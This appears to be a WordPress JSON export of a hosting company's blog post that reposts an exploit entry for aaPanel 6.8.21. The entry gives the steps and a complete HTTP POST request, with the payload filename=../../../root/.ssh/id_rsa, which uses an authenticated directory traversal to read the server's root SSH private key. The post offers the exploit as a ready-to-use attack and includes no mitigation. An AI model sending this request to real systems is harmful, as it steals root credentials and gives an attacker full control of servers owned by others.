# Exploit Title: aaPanel 6.8.21 – Directory Traversal (Authenticated)
\n# Date: 22.02.2022
\n# Exploit Author: Fikrat Ghuliev (Ghuliev)
\n# Vendor Homepage: https:\/\/www.aapanel.com\/
\n# Software Link: https:\/\/www.aapanel.com
\n# Version: 6.8.21
\n# Tested on: Ubuntu<\/p>\n
Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)<\/p>\n
#Go to App Store<\/p>\n
#Click to “install” in any free plugin.<\/p>\n
#Change installation script to ..\/..\/..\/root\/.ssh\/id_rsa<\/p>\n
POST \/ajax?action=get_lines HTTP\/1.1
\nHost: IP:7800
\nContent-Length: 41
\nAccept: *\/*
\nX-Requested-With: XMLHttpRequest
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)
\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.82
\nSafari\/537.36
\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8
\nOrigin: http:\/\/IP:7800
\nReferer: http:\/\/IP:7800\/soft
\nAccept-Encoding: gzip, deflate
\nAccept-Language: en-US,en;q=0.9
\nCookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
\nrequest_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
\nserverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
\npage_number=20; backup_path=\/www\/backup; sites_path=\/www\/wwwroot;
\ndistribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
\nload_type=null; load_search=undefined; force=0; rank=list;
\nPath=\/www\/wwwroot; bt_user_info=; default_dir_path=\/www\/wwwroot\/;
\npath_dir_change=\/www\/wwwroot\/
\nConnection: close<\/p>\n
num=10&filename=..\/..\/..\/root\/.ssh\/id_rsa<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: aaPanel 6.8.21 – Directory Traversal (Authenticated) # Date: 22.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https:\/\/www.aapanel.com\/ # Software Link: https:\/\/www.aapanel.com # Version: 6.8.21 # Tested on: Ubuntu Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa) #Go to App Store #Click to “install” in …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21034","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21034","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21034"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21034\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21034"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21034"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21034"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}